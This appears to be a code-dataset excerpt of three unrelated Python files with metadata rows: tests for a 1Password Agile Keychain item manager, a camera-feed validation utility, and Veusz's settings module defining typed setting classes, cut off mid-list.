from blimey.agile_keychain.data_source import AgileKeychainItem
from blimey.exceptions import ItemNotFoundException
class ItemManagerTest:
_fixture_path = os.path.join('tests', 'fixtures', 'test.agilekeychain')
_temporary_path = os.path.join('tests', 'fixtures', 'temp.agilekeychain')
_password = "somepassword"
def it_gets_items(self):
item_manager = ItemManager(self._fixture_path)
item = item_manager.get_by_id('5F7210FD2F3F460692B7083C60854A02')
assert item['uuid'] == "5F7210FD2F3F460692B7083C60854A02"
@raises(ItemNotFoundException)
def it_throws_if_requested_item_is_not_found(self):
item_manager = ItemManager(self._fixture_path)
item_manager.get_by_id('notfoundid')
# 1Password 3 changes deleted item type to system.Tombstone
# Refer to the item in the fixture for an example of this
@raises(ItemNotFoundException)
def it_throws_if_requested_item_is_of_type_tombstone(self):
item_manager = ItemManager(self._fixture_path)
item_manager.get_by_id('320BE3D1B490458F82314E1A2B99552A')
# 1Password 4+ replaces the item contents with "{}"
# Refer to the item in the fixture for an example of this
@raises(ItemNotFoundException)
def it_throws_if_requested_item_is_empty(self):
item_manager = ItemManager(self._fixture_path)
item_manager.get_by_id('CAF7A781A71E44CFBB63F9356B46A0C9')
def it_gets_all_non_null_and_non_tombstoned_items(self):
item_manager = ItemManager(self._fixture_path)
items = item_manager.get_all_items()
expected_item_uuids = [
'2E21D652E0754BD59F6B94B0323D0142',
'4A3D784D115F4279BDFCE46D0A162D57',
'5F7210FD2F3F460692B7083C60854A02',
'6371E49FEFA042EDB335421459E5B29F',
'9315F5EA8DCC4CB7BE09155DB7FCD1ED',
'97019BEBCF9E402F8F0C033474B1B85D',
'9E7673CCBB5B4AC9A7A8838835CB7E83',
'B851D6E3232842B0858BC10968632A9C',
'D05009E62D7D401CB8ACF2FE6981C031',
'ECE79F0A4BDF44CE8E7986897D84D1EC'
]
assert len(items) == len(expected_item_uuids)
for item in items:
assert item['uuid'] in expected_item_uuids
def it_saves_items(self):
self._init_default_data_dir()
item_manager = ItemManager(self._temporary_path)
item = self._get_item()
item_manager.save_item(item)
retrieved_item = item_manager.get_by_id(item['uuid'])
assert item['uuid'] == retrieved_item['uuid']
def it_sets_update_time_on_save(self):
self._init_default_data_dir()
item_manager = ItemManager(self._temporary_path)
item = self._get_item()
item_manager.save_item(item)
retrieved_item = item_manager.get_by_id(item['uuid'])
assert item['updatedAt'] > 0
assert item['updatedAt'] <= time.time()
def it_updates_contents_file_when_items_are_saved(self):
self._init_default_data_dir()
item_manager = ItemManager(self._temporary_path)
item = self._get_item()
item_manager.save_item(item)
with open(os.path.join(self._temporary_path, 'data', 'default', 'contents.js')) as file:
contents = json.load(file)
assert contents[0][0] == item['uuid']
assert contents[0][1] == item['typeName']
assert contents[0][2] == item['title']
assert contents[0][3] == item['locationKey']
assert contents[0][4] == item['folderUuid']
assert contents[0][5] == 0 # No idea what this value is
assert contents[0][6] == 'Y' # Corresponds to 'trashed'
def _get_item(self):
return AgileKeychainItem({
'uuid': 'abcdef',
'typeName': 'typename',
'title': 'Title',
'locationKey': 'locationkey',
'folderUuid': 'undefined',
'trashed': True
})
def _init_default_data_dir(self):
os.makedirs(os.path.join(self._temporary_path, 'data', 'default'))
self.teardown = self._path_clean
def _path_clean(self):
shutil.rmtree(self._temporary_path)
|
mit
| -2,044,052,607,398,452,500
| 34.336066
| 96
| 0.644398
| false
| 3.221973
| false
| false
| false
|
LukeJFernandez/stitch-flex
|
app/util/validatefeeds.py
|
1
|
1341
|
""" Utility module for validating camera feeds. """
from __future__ import absolute_import, division, print_function
from .textformatter import TextFormatter
from .feed import CameraFeed
def view_valid_camera_feeds():
"""
Shows all valid feed views, one after another. The next feed shows when the current is closed.
"""
valid_feeds = []
TextFormatter.print_heading("Checking for valid feeds.")
try:
for index in xrange(1, 5):
if check_feed(index):
valid_feeds.append(index)
except NameError:
for index in range(1, 5):
if check_feed(index):
valid_feeds.append(index)
if len(valid_feeds) > 0:
TextFormatter.print_heading("Valid Feeds:")
for feed in valid_feeds:
show_camera_feed(feed)
else:
TextFormatter.print_info("No Valid Feeds")
def check_feed(feed_index):
"""
Checks if the provided index points to a valid camera feed.
"""
camera_feed = CameraFeed(feed_index)
return camera_feed.is_valid()
def show_camera_feed(feed_index):
"""
Shows the camera feed pointed to by the provided feed_index.
"""
camera_feed = CameraFeed(feed_index)
# Show the uncorrected feed.
camera_feed.show(False)
if __name__ == "__main__":
view_valid_camera_feeds()
|
mit
| 2,553,727,568,890,088,000
| 28.152174
| 98
| 0.634601
| false
| 3.853448
| false
| false
| false
|
arichar6/veusz
|
veusz/setting/setting.py
|
1
|
57973
|
# Copyright (C) 2005 Jeremy S. Sanders
# Email: Jeremy Sanders <jeremy@jeremysanders.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
"""Module for holding setting values.
e.g.
s = Int('foo', 5)
s.get()
s.set(42)
s.fromUIText('42')
"""
from __future__ import division
import re
import sys
import numpy as N
from ..compat import cbasestr, cstr, crepr
from .. import qtall as qt4
from . import controls
from .settingdb import settingdb, uilocale, ui_floattostring, ui_stringtofloat
from .reference import ReferenceBase, Reference
from .. import utils
from .. import datasets
class OnModified(qt4.QObject):
"""onmodified is emitted from an object contained in each setting."""
onModified = qt4.pyqtSignal()
class Setting(object):
"""A class to store a value with a particular type."""
# differentiate widgets, settings and setting
nodetype = 'setting'
typename = 'setting'
# various items in class hierarchy
iswidget = False
issetting = True
issettings = False
def __init__(self, name, value, descr='', usertext='',
formatting=False, hidden=False):
"""Initialise the values.
name: setting name
value: default value and initial value
descr: description of the setting
usertext: name of setting for user
formatting: whether setting applies to formatting
hidden: hide widget from user
"""
self.readonly = False
self.parent = None
self.name = name
self.descr = descr
self.usertext = usertext
self.formatting = formatting
self.hidden = hidden
self.default = value
self.onmodified = OnModified()
self._val = self._ref = None
# calls the set function for the val property
self.val = value
def _copyHelper(self, before, after, optional):
"""Help copy an object.
before are arguments before val
after are arguments after val
optinal as optional arguments
"""
val = self._ref if self._ref else self._val
args = (self.name,) + before + (val,) + after
opt = optional.copy()
opt['descr'] = self.descr
opt['usertext'] = self.usertext
opt['formatting'] = self.formatting
opt['hidden'] = self.hidden
obj = self.__class__(*args, **opt)
obj.readonly = self.readonly
obj.default = self.default
return obj
def copy(self):
"""Make a setting which has its values copied from this one.
This needs to be overridden if the constructor changes
"""
return self._copyHelper((), (), {})
def get(self):
"""Get the value."""
if self._ref:
return self._ref.resolve(self).get()
else:
return self._val
def set(self, v):
"""Set the value."""
if isinstance(v, ReferenceBase):
self._val = None
self._ref = v
else:
self._val = self.normalize(v)
self._ref = None
self.onmodified.onModified.emit()
val = property(
get, set, None,
'Get or modify the value of the setting')
def isReference(self):
"""Is this a setting a reference to another object."""
return bool(self._ref)
def getReference(self):
"""Return the reference object. Raise ValueError if not a reference"""
if self._ref:
return self._ref
else:
raise ValueError("Setting is not a reference")
def getStylesheetLink(self):
"""Get text that this setting should default to linked to the
stylesheet."""
path = []
obj = self
while not obj.parent.iswidget:
path.insert(0, obj.name)
obj = obj.parent
path = ['', 'StyleSheet', obj.parent.typename] + path
return '/'.join(path)
def linkToStylesheet(self):
"""Make this setting link to stylesheet setting, if possible."""
self.set( Reference(self.getStylesheetLink()) )
@property
def path(self):
"""Return full path of setting."""
path = []
obj = self
while obj is not None:
# logic easier to understand here
# do not add settings name for settings of widget
if not obj.iswidget and obj.parent.iswidget:
pass
else:
if obj.name == '/':
path.insert(0, '')
else:
path.insert(0, obj.name)
obj = obj.parent
return '/'.join(path)
def toUIText(self):
"""Convert the type to text to show in UI."""
return ""
def fromUIText(self, text):
"""Convert text from UI into type for setting.
Raises utils.InvalidType if cannot convert."""
return None
def saveText(self, saveall, rootname = ''):
"""Return text to restore the value of this setting."""
if (saveall or not self.isDefault()) and not self.readonly:
if self._ref:
return "SetToReference('%s%s', %s)\n" % (
rootname, self.name, crepr(self._ref.value))
else:
return "Set('%s%s', %s)\n" % (
rootname, self.name, crepr(self.val) )
else:
return ''
def setOnModified(self, fn):
"""Set the function to be called on modification (passing True)."""
self.onmodified.onModified.connect(fn)
if self._ref:
# tell references to notify us if they are modified
self._ref.setOnModified(self, fn)
def removeOnModified(self, fn):
"""Remove the function from the list of function to be called."""
self.onmodified.onModified.disconnect(fn)
def newDefault(self, value):
"""Update the default and the value."""
self.default = value
self.val = value
def isDefault(self):
"""Is the current value a default?
This also returns true if it is linked to the appropriate stylesheet
"""
if self._ref and isinstance(self.default, ReferenceBase):
return self._ref.value == self.default.value
else:
return self._val == self.default
def isDefaultLink(self):
"""Is this a link to the default stylesheet value."""
return self._ref and self._ref.value == self.getStylesheetLink()
def setSilent(self, val):
"""Set the setting, without propagating modified flags.
This shouldn't often be used as it defeats the automatic updation.
Used for temporary modifications."""
self._ref = None
self._val = self.normalize(val)
def normalize(self, val):
"""Convert external value to normalized form for storing
Raises a utils.InvalidType if this is not possible."""
return val
def makeControl(self, *args):
"""Make a qt control for editing the setting.
The control emits settingValueChanged() when the setting has
changed value."""
return None
def getDocument(self):
"""Return document."""
p = self.parent
while p:
if p.iswidget:
return p.document
p = p.parent
return None
def getWidget(self):
"""Return associated widget."""
w = self.parent
while not w.iswidget:
w = w.parent
return w
def safeEvalHelper(self, text):
"""Evaluate an expression, catching naughtiness."""
try:
comp = self.getDocument().evaluate.compileCheckedExpression(
text)
if comp is None:
raise utils.InvalidType
return float( eval(comp, self.getDocument().evaluate.context) )
except:
raise utils.InvalidType
# forward setting to another setting
class SettingBackwardCompat(Setting):
"""Forward setting requests to another setting.
This is used for backward-compatibility.
"""
typename = 'backward-compat'
def __init__(self, name, newrelpath, val, translatefn=None,
**args):
"""Point this setting to another.
newrelpath is a path relative to this setting's parent
"""
self.translatefn = translatefn
args['hidden'] = True
Setting.__init__(self, name, val, **args)
self.relpath = newrelpath
def getForward(self):
"""Get setting this setting forwards to."""
doc = self.getDocument()
return doc.resolveSettingPath(self.parent, self.relpath)
def normalize(self, val):
if self.parent is not None:
return self.getForward().normalize(val)
def toUIText(self):
return self.getForward().toUIText()
def fromUIText(self, val):
return self.getForward().fromUIText(val)
def set(self, val):
if self.parent is not None and not isinstance(val, ReferenceBase):
if self.translatefn:
val = self.translatefn(val)
self.getForward().set(val)
def isDefault(self):
return self.getForward().isDefault()
def get(self):
return self.getForward().get()
def copy(self):
return self._copyHelper(
(self.relpath,), (), {'translatefn': self.translatefn})
def makeControl(self, *args):
return None
def saveText(self, saveall, rootname = ''):
return ''
def linkToStylesheet(self):
"""Do nothing for backward compatibility settings."""
pass
# Store strings
class Str(Setting):
"""String setting."""
typename = 'str'
def normalize(self, val):
if isinstance(val, cbasestr):
return val
raise utils.InvalidType
def toUIText(self):
return self.val
def fromUIText(self, text):
return text
def makeControl(self, *args):
return controls.String(self, *args)
class Notes(Str):
"""String for making notes."""
typename = 'str-notes'
def makeControl(self, *args):
return controls.Notes(self, *args)
# Store bools
class Bool(Setting):
"""Bool setting."""
typename = 'bool'
def normalize(self, val):
if type(val) in (bool, int):
return bool(val)
raise utils.InvalidType
def toUIText(self):
return 'True' if self.val else 'False'
def fromUIText(self, text):
t = text.strip().lower()
if t in ('true', '1', 't', 'y', 'yes'):
return True
elif t in ('false', '0', 'f', 'n', 'no'):
return False
else:
raise utils.InvalidType
def makeControl(self, *args):
return controls.Bool(self, *args)
# Storing integers
class Int(Setting):
"""Integer settings."""
typename = 'int'
def __init__(self, name, value, minval=-1000000, maxval=1000000,
**args):
"""Initialise the values.
minval is minimum possible value of setting
maxval is maximum possible value of setting
"""
self.minval = minval
self.maxval = maxval
Setting.__init__(self, name, value, **args)
def copy(self):
"""Make a setting which has its values copied from this one.
This needs to be overridden if the constructor changes
"""
return self._copyHelper((), (), {'minval': self.minval,
'maxval': self.maxval})
def normalize(self, val):
if isinstance(val, int):
if val >= self.minval and val <= self.maxval:
return val
else:
raise utils.InvalidType('Out of range allowed')
raise utils.InvalidType
def toUIText(self):
return uilocale.toString(self.val)
def fromUIText(self, text):
i, ok = uilocale.toLongLong(text)
if not ok:
raise ValueError
if i >= self.minval and i <= self.maxval:
return i
else:
raise utils.InvalidType('Out of range allowed')
def makeControl(self, *args):
return controls.Int(self, *args)
def _finiteRangeFloat(f, minval=-1e300, maxval=1e300):
"""Return a finite float in range or raise exception otherwise."""
f = float(f)
if not N.isfinite(f):
raise utils.InvalidType('Finite values only allowed')
if f < minval or f > maxval:
raise utils.InvalidType('Out of range allowed')
return f
# for storing floats
class Float(Setting):
"""Float settings."""
typename = 'float'
def __init__(self, name, value, minval=-1e200, maxval=1e200,
**args):
"""Initialise the values.
minval is minimum possible value of setting
maxval is maximum possible value of setting
"""
self.minval = minval
self.maxval = maxval
Setting.__init__(self, name, value, **args)
def copy(self):
"""Make a setting which has its values copied from this one.
This needs to be overridden if the constructor changes
"""
return self._copyHelper((), (), {'minval': self.minval,
'maxval': self.maxval})
def normalize(self, val):
if isinstance(val, int) or isinstance(val, float):
return _finiteRangeFloat(
val, minval=self.minval, maxval=self.maxval)
raise utils.InvalidType
def toUIText(self):
return ui_floattostring(self.val)
def fromUIText(self, text):
try:
f = ui_stringtofloat(text)
except ValueError:
# try to evaluate
f = self.safeEvalHelper(text)
return self.normalize(f)
def makeControl(self, *args):
return controls.Edit(self, *args)
class FloatOrAuto(Float):
"""Save a float or text auto."""
typename = 'float-or-auto'
def normalize(self, val):
if type(val) in (int, float):
return _finiteRangeFloat(val, minval=self.minval, maxval=self.maxval)
elif isinstance(val, cbasestr) and val.strip().lower() == 'auto':
return 'Auto'
else:
raise utils.InvalidType
def toUIText(self):
if isinstance(self.val, cbasestr) and self.val.lower() == 'auto':
return 'Auto'
else:
return ui_floattostring(self.val)
def fromUIText(self, text):
if text.strip().lower() == 'auto':
return 'Auto'
else:
return Float.fromUIText(self, text)
def makeControl(self, *args):
return controls.Choice(self, True, ['Auto'], *args)
class IntOrAuto(Setting):
"""Save an int or text auto."""
typename = 'int-or-auto'
def normalize(self, val):
if isinstance(val, int):
return val
elif isinstance(val, cbasestr) and val.strip().lower() == 'auto':
return 'Auto'
else:
raise utils.InvalidType
def toUIText(self):
if isinstance(self.val, cbasestr) and self.val.lower() == 'auto':
return 'Auto'
else:
return uilocale.toString(self.val)
def fromUIText(self, text):
if text.strip().lower() == 'auto':
return 'Auto'
else:
i, ok = uilocale.toLongLong(text)
if not ok:
raise utils.InvalidType
return i
def makeControl(self, *args):
return controls.Choice(self, True, ['Auto'], *args)
# these are functions used by the distance setting below.
# they don't work as class methods
def _distPhys(match, painter, mult):
"""Convert a physical unit measure in multiples of points."""
return painter.pixperpt * mult * float(match.group(1))
def _idistval(val, unit):
"""Convert value to text, dropping zeros and . points on right."""
return ("%.3f" % val).rstrip('0').rstrip('.') + unit
def _distInvPhys(pixdist, painter, mult, unit):
"""Convert number of pixels into physical distance."""
return _idistval(pixdist / (mult*painter.pixperpt), unit)
def _distPerc(match, painter):
"""Convert from a percentage of maxdim."""
return painter.maxdim * 0.01 * float(match.group(1))
def _distInvPerc(pixdist, painter):
"""Convert pixel distance into percentage."""
return _idistval(pixdist * 100. / painter.maxdim, '%')
def _distFrac(match, painter):
"""Convert from a fraction a/b of maxdim."""
try:
return painter.maxdim * float(match.group(1))/float(match.group(4))
except ZeroDivisionError:
return 0.
def _distRatio(match, painter):
"""Convert from a simple 0.xx ratio of maxdim."""
# if it's greater than 1 then assume it's a point measurement
if float(match.group(1)) > 1.:
return _distPhys(match, painter, 1)
return painter.maxdim * float(match.group(1))
# regular expression to match distances
distre_expr = r'''^
[ ]* # optional whitespace
(\.?[0-9]+|[0-9]+\.[0-9]*) # a floating point number
[ ]* # whitespace
(cm|pt|mm|inch|in|"|%|| # ( unit, no unit,
(?P<slash>/) ) # or / )
(?(slash)[ ]* # if it was a slash, match any whitespace
(\.?[0-9]+|[0-9]+\.[0-9]*)) # and match following fp number
[ ]* # optional whitespace
$'''
class Distance(Setting):
"""A veusz distance measure, e.g. 1pt or 3%."""
typename = 'distance'
# match a distance
distre = re.compile(distre_expr, re.VERBOSE)
# functions to convert from unit values to points
unit_func = {
'cm': lambda match, painter:
_distPhys(match, painter, 720/25.4),
'pt': lambda match, painter:
_distPhys(match, painter, 1.),
'mm': lambda match, painter:
_distPhys(match, painter, 72/25.4),
'in': lambda match, painter:
_distPhys(match, painter, 72.),
'inch': lambda match, painter:
_distPhys(match, painter, 72.),
'"': lambda match, painter:
_distPhys(match, painter, 72.),
'%': _distPerc,
'/': _distFrac,
'': _distRatio
}
# inverse functions for converting points to units
inv_unit_func = {
'cm': lambda match, painter:
_distInvPhys(match, painter, 720/25.4, 'cm'),
'pt': lambda match, painter:
_distInvPhys(match, painter, 1., 'pt'),
'mm': lambda match, painter:
_distInvPhys(match, painter, 72/25.4, 'mm'),
'in': lambda match, painter:
_distInvPhys(match, painter, 72., 'in'),
'inch': lambda match, painter:
_distInvPhys(match, painter, 72., 'in'),
'"': lambda match, painter:
_distInvPhys(match, painter, 72., 'in'),
'%': _distInvPerc,
'/': _distInvPerc,
'': _distInvPerc
}
@classmethod
def isDist(kls, dist):
"""Is the text a valid distance measure?"""
return kls.distre.match(dist) is not None
def normalize(self, val):
if self.distre.match(val) is not None:
return val
else:
raise utils.InvalidType
def toUIText(self):
# convert decimal point to display locale
return self.val.replace('.', uilocale.decimalPoint())
def fromUIText(self, text):
# convert decimal point from display locale
text = text.replace(uilocale.decimalPoint(), '.')
if self.isDist(text):
return text
else:
raise utils.InvalidType
def makeControl(self, *args):
return controls.Distance(self, *args)
@classmethod
def convertDistance(kls, painter, dist):
'''Convert a distance to plotter units.
dist: eg 0.1 (fraction), 10% (percentage), 1/10 (fraction),
10pt, 1cm, 20mm, 1inch, 1in, 1" (size)
painter: painter to get metrics to convert physical sizes
'''
# match distance against expression
m = kls.distre.match(dist)
if m is not None:
# lookup function to call to do conversion
func = kls.unit_func[m.group(2)]
return func(m, painter)
# none of the regexps match
raise ValueError( "Cannot convert distance in form '%s'" %
dist )
def convert(self, painter):
"""Convert this setting's distance as above"""
return self.convertDistance(painter, self.val)
def convertPts(self, painter):
"""Get the distance in points."""
return self.convert(painter) / painter.pixperpt
def convertInverse(self, distpix, painter):
"""Convert distance in pixels into units of this distance.
"""
m = self.distre.match(self.val)
if m is not None:
# if it matches convert back
inversefn = self.inv_unit_func[m.group(2)]
else:
# otherwise force unit
inversefn = self.inv_unit_func['cm']
# do inverse mapping
return inversefn(distpix, painter)
class DistancePt(Distance):
"""For a distance in points."""
def makeControl(self, *args):
return controls.DistancePt(self, *args)
class DistancePhysical(Distance):
"""For physical distances (no fractional)."""
def isDist(self, val):
m = self.distre.match(val)
if m:
# disallow non-physical distances
if m.group(2) not in ('/', '', '%'):
return True
return False
def makeControl(self, *args):
return controls.Distance(self, *args, physical=True)
class DistanceOrAuto(Distance):
"""A distance or the value Auto"""
typename = 'distance-or-auto'
distre = re.compile( distre_expr + r'|^Auto$', re.VERBOSE )
def isAuto(self):
return self.val == 'Auto'
def makeControl(self, *args):
return controls.Distance(self, allowauto=True, *args)
class Choice(Setting):
"""One out of a list of strings."""
# maybe should be implemented as a dict to speed up checks
typename = 'choice'
def __init__(self, name, vallist, val, **args):
"""Setting val must be in vallist.
descriptions is an optional addon to put a tooltip on each item
in the control.
"""
assert type(vallist) in (list, tuple)
self.vallist = vallist
self.descriptions = args.get('descriptions', None)
if self.descriptions:
del args['descriptions']
Setting.__init__(self, name, val, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((self.vallist,), (), {})
def normalize(self, val):
if val in self.vallist:
return val
else:
raise utils.InvalidType
def toUIText(self):
return self.val
def fromUIText(self, text):
if text in self.vallist:
return text
else:
raise utils.InvalidType
def makeControl(self, *args):
argsv = {'descriptions': self.descriptions}
return controls.Choice(self, False, self.vallist, *args, **argsv)
class ChoiceOrMore(Setting):
"""One out of a list of strings, or anything else."""
# maybe should be implemented as a dict to speed up checks
typename = 'choice-or-more'
def __init__(self, name, vallist, val, **args):
"""Setting has val must be in vallist.
descriptions is an optional addon to put a tooltip on each item
in the control
"""
self.vallist = vallist
self.descriptions = args.get('descriptions', None)
if self.descriptions:
del args['descriptions']
Setting.__init__(self, name, val, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((self.vallist,), (), {})
def normalize(self, val):
return val
def toUIText(self):
return self.val
def fromUIText(self, text):
return text
def makeControl(self, *args):
argsv = {'descriptions': self.descriptions}
return controls.Choice(self, True, self.vallist, *args, **argsv)
class FloatChoice(ChoiceOrMore):
"""A numeric value, which can also be chosen from the list of values."""
typename = 'float-choice'
def normalize(self, val):
if isinstance(val, int) or isinstance(val, float):
return _finiteRangeFloat(val)
raise utils.InvalidType
def toUIText(self):
return ui_floattostring(self.val)
def fromUIText(self, text):
try:
f = ui_stringtofloat(text)
except ValueError:
# try to evaluate
f = self.safeEvalHelper(text)
return self.normalize(f)
def makeControl(self, *args):
argsv = {'descriptions': self.descriptions}
strings = [ui_floattostring(x) for x in self.vallist]
return controls.Choice(self, True, strings, *args, **argsv)
class FloatDict(Setting):
"""A dictionary, taking floats as values."""
typename = 'float-dict'
def normalize(self, val):
if type(val) != dict:
raise utils.InvalidType
for v in val.values():
if type(v) not in (float, int):
raise utils.InvalidType
# return copy
return dict(val)
def toUIText(self):
text = ['%s = %s' % (k, ui_floattostring(self.val[k]))
for k in sorted(self.val)]
return '\n'.join(text)
def fromUIText(self, text):
"""Do conversion from list of a=X\n values."""
out = {}
# break up into lines
for l in text.split('\n'):
l = l.strip()
if len(l) == 0:
continue
# break up using =
p = l.strip().split('=')
if len(p) != 2:
raise utils.InvalidType
try:
v = ui_stringtofloat(p[1])
except ValueError:
raise utils.InvalidType
out[ p[0].strip() ] = v
return out
def makeControl(self, *args):
return controls.MultiLine(self, *args)
class FloatList(Setting):
"""A list of float values."""
typename = 'float-list'
def normalize(self, val):
if type(val) not in (list, tuple):
raise utils.InvalidType
# horribly slow test for invalid entries
out = []
for i in val:
if type(i) not in (float, int):
raise utils.InvalidType
else:
out.append( float(i) )
return out
def toUIText(self):
"""Make a string a, b, c."""
# can't use the comma for splitting if used as a decimal point
join = ', '
if uilocale.decimalPoint() == ',':
join = '; '
return join.join( [ui_floattostring(x) for x in self.val] )
def fromUIText(self, text):
"""Convert from a, b, c or a b c."""
# don't use commas if it is the decimal separator
splitre = r'[\t\n, ]+'
if uilocale.decimalPoint() == ',':
splitre = r'[\t\n; ]+'
out = []
for x in re.split(splitre, text.strip()):
if x:
try:
out.append( ui_stringtofloat(x) )
except ValueError:
out.append( self.safeEvalHelper(x) )
return out
def makeControl(self, *args):
return controls.String(self, *args)
class WidgetPath(Str):
"""A setting holding a path to a widget. This is checked for validity."""
typename = 'widget-path'
def __init__(self, name, val, relativetoparent=True,
allowedwidgets = None,
**args):
"""Initialise the setting.
The widget is located relative to
parent if relativetoparent is True, otherwise this widget.
If allowedwidgets is not None, only those widgets types in the list are
allowed by this setting.
"""
Str.__init__(self, name, val, **args)
self.relativetoparent = relativetoparent
self.allowedwidgets = allowedwidgets
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (),
{'relativetoparent': self.relativetoparent,
'allowedwidgets': self.allowedwidgets})
def getReferredWidget(self, val = None):
"""Get the widget referred to. We double-check here to make sure
it's the one.
Returns None if setting is blank
utils.InvalidType is raised if there's a problem
"""
# this is a bit of a hack, so we don't have to pass a value
# for the setting (which we need to from normalize)
if val is None:
val = self.val
if val == '':
return None
# find the widget associated with this setting
widget = self
while not widget.iswidget:
widget = widget.parent
# usually makes sense to give paths relative to a parent of a widget
if self.relativetoparent:
widget = widget.parent
# resolve the text to a widget
try:
widget = widget.document.resolveWidgetPath(widget, val)
except ValueError:
raise utils.InvalidType
# check the widget against the list of allowed types if given
if self.allowedwidgets is not None:
allowed = False
for c in self.allowedwidgets:
if isinstance(widget, c):
allowed = True
if not allowed:
raise utils.InvalidType
return widget
class Dataset(Str):
"""A setting to choose from the possible datasets."""
typename = 'dataset'
def __init__(self, name, val, dimensions=1, datatype='numeric',
**args):
"""
dimensions is the number of dimensions the dataset needs
"""
self.dimensions = dimensions
self.datatype = datatype
Setting.__init__(self, name, val, **args)
def copy(self):
"""Make a setting which has its values copied from this one."""
return self._copyHelper((), (),
{'dimensions': self.dimensions,
'datatype': self.datatype})
def makeControl(self, *args):
"""Allow user to choose between the datasets."""
return controls.Dataset(self, self.getDocument(), self.dimensions,
self.datatype, *args)
def getData(self, doc):
"""Return a list of datasets entered."""
d = doc.data.get(self.val)
if ( d is not None and
d.datatype == self.datatype and
(d.dimensions == self.dimensions or self.dimensions == 'all') ):
return d
class Strings(Setting):
"""A multiple set of strings."""
typename = 'str-multi'
def normalize(self, val):
"""Takes a tuple/list of strings:
('ds1','ds2'...)
"""
if isinstance(val, cbasestr):
return (val, )
if type(val) not in (list, tuple):
raise utils.InvalidType
# check each entry in the list is appropriate
for ds in val:
if not isinstance(ds, cbasestr):
raise utils.InvalidType
return tuple(val)
def makeControl(self, *args):
"""Allow user to choose between the datasets."""
return controls.Strings(self, self.getDocument(), *args)
class Datasets(Setting):
"""A setting to choose one or more of the possible datasets."""
typename = 'dataset-multi'
def __init__(self, name, val, dimensions=1, datatype='numeric',
**args):
"""
dimensions is the number of dimensions the dataset needs
"""
Setting.__init__(self, name, val, **args)
self.dimensions = dimensions
self.datatype = datatype
def normalize(self, val):
"""Takes a tuple/list of strings:
('ds1','ds2'...)
"""
if isinstance(val, cbasestr):
return (val, )
if type(val) not in (list, tuple):
raise utils.InvalidType
# check each entry in the list is appropriate
for ds in val:
if not isinstance(ds, cbasestr):
raise utils.InvalidType
return tuple(val)
def copy(self):
"""Make a setting which has its values copied from this one."""
return self._copyHelper((), (),
{'dimensions': self.dimensions,
'datatype': self.datatype})
def makeControl(self, *args):
"""Allow user to choose between the datasets."""
return controls.Datasets(self, self.getDocument(), self.dimensions,
self.datatype, *args)
def getData(self, doc):
"""Return a list of datasets entered."""
out = []
for name in self.val:
d = doc.data.get(name)
if ( d is not None and
d.datatype == self.datatype and
d.dimensions == self.dimensions ):
out.append(d)
return out
class DatasetExtended(Dataset):
"""Choose a dataset, give an expression or specify a list of float
values."""
typename = 'dataset-extended'
def normalize(self, val):
"""Check is a string (dataset name or expression) or a list of
floats (numbers).
"""
if isinstance(val, cbasestr):
return val
elif self.dimensions == 1:
# list of numbers only allowed for 1d datasets
if isinstance(val, float) or isinstance(val, int):
return [val]
else:
try:
return [float(x) for x in val]
except (TypeError, ValueError):
pass
raise utils.InvalidType
def toUIText(self):
if isinstance(self.val, cbasestr):
return self.val
else:
# join based on , or ; depending on decimal point
join = ', '
if uilocale.decimalPoint() == ',':
join = '; '
return join.join( [ ui_floattostring(x)
for x in self.val ] )
def fromUIText(self, text):
"""Convert from text."""
text = text.strip()
if self.dimensions > 1:
return text
# split based on , or ; depending on decimal point
splitre = r'[\t\n, ]+'
if uilocale.decimalPoint() == ',':
splitre = r'[\t\n; ]+'
out = []
for x in re.split(splitre, text):
if x:
try:
out.append( ui_stringtofloat(x) )
except ValueError:
# fail conversion, so exit with text
return text
return out
def getFloatArray(self, doc):
"""Get a numpy of values or None."""
if isinstance(self.val, cbasestr):
ds = doc.evaluate.evalDatasetExpression(
self.val, datatype=self.datatype, dimensions=self.dimensions)
if ds:
# get numpy array of values
return N.array(ds.data)
else:
# list of values
return N.array(self.val)
return None
def isDataset(self, doc):
"""Is this setting a dataset?"""
return (isinstance(self.val, cbasestr) and
doc.data.get(self.val))
def isEmpty(self):
"""Is this unset?"""
return self.val == [] or self.val == ''
def getData(self, doc):
"""Return veusz dataset"""
if isinstance(self.val, cbasestr):
return doc.evaluate.evalDatasetExpression(
self.val, datatype=self.datatype, dimensions=self.dimensions)
else:
return datasets.valsToDataset(
self.val, self.datatype, self.dimensions)
class DatasetOrStr(Dataset):
"""Choose a dataset or enter a string.
Non string datasets are converted to string arrays using this.
"""
typename = 'dataset-or-str'
def __init__(self, name, val, **args):
Dataset.__init__(self, name, val, datatype='text', **args)
def getData(self, doc, checknull=False):
"""Return either a list of strings, a single item list.
If checknull then None is returned if blank
"""
if doc:
ds = doc.data.get(self.val)
if ds and ds.dimensions == 1:
return doc.formatValsWithDatatypeToText(
ds.data, ds.displaytype)
if checknull and not self.val:
return None
else:
return [cstr(self.val)]
def makeControl(self, *args):
return controls.DatasetOrString(self, self.getDocument(), *args)
def copy(self):
"""Make a setting which has its values copied from this one."""
return self._copyHelper((), (), {})
class Color(ChoiceOrMore):
"""A color setting."""
typename = 'color'
def __init__(self, name, value, **args):
"""Initialise the color setting with the given name, default
and description."""
ChoiceOrMore.__init__(self, name, [], value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def color(self, painter, dataindex=0):
"""Return QColor from color.
painter is a Veusz Painter
dataindex is index for automatically getting colors for subdatasets.
"""
if self.val.lower() == 'auto':
# lookup widget
w = self.parent
while w is not None and not w.iswidget:
w = w.parent
if w is None:
return qt4.QColor()
# get automatic color
return painter.docColor(w.autoColor(painter, dataindex=dataindex))
else:
return painter.docColor(self.val)
def makeControl(self, *args):
return controls.Color(self, *args)
class FillStyle(Choice):
"""A setting for the different fill styles provided by Qt."""
typename = 'fill-style'
_fillstyles = [ 'solid', 'horizontal', 'vertical', 'cross',
